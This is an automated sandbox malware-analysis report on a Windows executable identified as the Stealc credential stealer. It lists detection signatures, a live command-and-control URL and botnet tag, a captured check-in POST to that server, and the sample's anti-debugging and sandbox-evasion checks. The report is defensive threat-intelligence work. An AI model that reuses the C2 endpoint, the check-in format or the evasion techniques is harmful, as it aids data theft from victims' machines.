Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542734
MD5:79ad5f851a1231db208f005432d0cf1c
SHA1:67776523d7821292da1ced82653558a60b8a7f19
SHA256:ab409dfe5cafaa8a881a844cd26eed91995b9546528e494db3b46f26812824eb
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79AD5F851A1231DB208F005432D0CF1C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7460JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7460JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.f60000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-26T08:52:26.981236+020020442431Malware Command and Control Activity Detected192.168.2.849705185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.f60000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.206/e2b1563c6670f193.php/Virustotal: Detection: 7%Perma Link
                Source: http://185.215.113.206/Virustotal: Detection: 14%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00F6C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F69AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00F69AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F67240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00F67240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F69B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00F69B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F78EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00F78EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F74910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F6DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F6E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F74570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F6ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F6F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F73EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F73EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F6BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F6DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 45 33 44 42 36 33 36 43 31 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="hwid"BE3DB636C1012263180025------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build"puma------IEBAAFCAFCBKFHJJJKKF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F64880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00F64880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 45 33 44 42 36 33 36 43 31 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="hwid"BE3DB636C1012263180025------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build"puma------IEBAAFCAFCBKFHJJJKKF--
                Source: file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php2
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpD
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpX
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/w9
                Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206gw0

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013319700_2_01331970
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130399A0_2_0130399A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C0320_2_0124C032
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01336B9E0_2_01336B9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FB3E10_2_012FB3E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133BA040_2_0133BA04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01232D270_2_01232D27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133D5050_2_0133D505
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01239DF10_2_01239DF1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01334DD20_2_01334DD2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132FDD70_2_0132FDD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DFE050_2_011DFE05
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F645C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: seldsqgz ZLIB complexity 0.9948511172038198
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F78680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00F78680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F73720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00F73720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\2J4URBJA.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1872384 > 1048576
                Source: file.exeStatic PE information: Raw size of seldsqgz is bigger than: 0x100000 < 0x1a2e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;seldsqgz:EW;ogrbyegi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;seldsqgz:EW;ogrbyegi:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F79860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F79860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cc620 should be: 0x1d0d5f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: seldsqgz
                Source: file.exeStatic PE information: section name: ogrbyegi
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01275927 push edi; mov dword ptr [esp], ecx0_2_012759B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01275927 push edi; mov dword ptr [esp], ebx0_2_012759CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013EE93A push 519E7FBEh; mov dword ptr [esp], ebx0_2_013EE987
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0160B152 push 0E056C91h; mov dword ptr [esp], ebx0_2_0160B196
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013DB106 push ecx; mov dword ptr [esp], 4C78BDB0h0_2_013DB160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137190B push eax; mov dword ptr [esp], edi0_2_01371985
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ebp; mov dword ptr [esp], 327CF32Fh0_2_01331986
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 0727CF27h; mov dword ptr [esp], eax0_2_013319F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push esi; mov dword ptr [esp], 00000546h0_2_01331A0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ecx; mov dword ptr [esp], ebx0_2_01331A66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ebp; mov dword ptr [esp], 76C9290Ch0_2_01331AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 441054D6h; mov dword ptr [esp], edi0_2_01331AE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 5D3E4D99h; mov dword ptr [esp], eax0_2_01331AF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ebx; mov dword ptr [esp], eax0_2_01331B79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push edx; mov dword ptr [esp], esi0_2_01331BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ecx; mov dword ptr [esp], eax0_2_01331BC4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 789EC220h; mov dword ptr [esp], ebx0_2_01331CDF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 3A2977BAh; mov dword ptr [esp], ebp0_2_01331D37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push edi; mov dword ptr [esp], esi0_2_01331D92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 6F0E5E91h; mov dword ptr [esp], ecx0_2_01331E3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push esi; mov dword ptr [esp], edi0_2_01331E68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push edi; mov dword ptr [esp], edx0_2_01331EC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 16683FF2h; mov dword ptr [esp], ecx0_2_01331EE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 53B675E6h; mov dword ptr [esp], edi0_2_01331EEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ebp; mov dword ptr [esp], edi0_2_01331F32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push eax; mov dword ptr [esp], ecx0_2_01331F48
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 372F0F62h; mov dword ptr [esp], ecx0_2_01331F6F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push 7BD30E65h; mov dword ptr [esp], ecx0_2_01331FE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ebx; mov dword ptr [esp], ebp0_2_01332054
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push edi; mov dword ptr [esp], 04A11B93h0_2_01332075
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01331970 push ecx; mov dword ptr [esp], edx0_2_013320C8
                Source: file.exeStatic PE information: section name: seldsqgz entropy: 7.953063323630895

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F79860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F79860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13264
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C258D second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007EFD80CCF033h 0x00000013 push dword ptr [ebp+122D02F5h] 0x00000019 pushad 0x0000001a mov edi, dword ptr [ebp+122D2A6Ah] 0x00000020 mov dword ptr [ebp+122D1C3Ah], edx 0x00000026 popad 0x00000027 stc 0x00000028 call dword ptr [ebp+122D21C2h] 0x0000002e pushad 0x0000002f pushad 0x00000030 call 00007EFD80CCF039h 0x00000035 push ecx 0x00000036 pop eax 0x00000037 pop ebx 0x00000038 jmp 00007EFD80CCF030h 0x0000003d popad 0x0000003e xor eax, eax 0x00000040 mov dword ptr [ebp+122D2D08h], edx 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a jmp 00007EFD80CCF036h 0x0000004f mov dword ptr [ebp+122D2B3Eh], eax 0x00000055 jmp 00007EFD80CCF033h 0x0000005a mov esi, 0000003Ch 0x0000005f add dword ptr [ebp+122D2D08h], eax 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 sub dword ptr [ebp+122D2CECh], ebx 0x0000006f lodsw 0x00000071 or dword ptr [ebp+122D3035h], edx 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b sub dword ptr [ebp+122D24D1h], ecx 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 stc 0x00000086 nop 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a jp 00007EFD80CCF026h 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D57 second address: 11C1D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D6E second address: 11C1D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007EFD80CCF026h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134259B second address: 13425BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jp 00007EFD80CDE8C8h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007EFD80CDE8C6h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13425BA second address: 13425BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13364BF second address: 13364C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
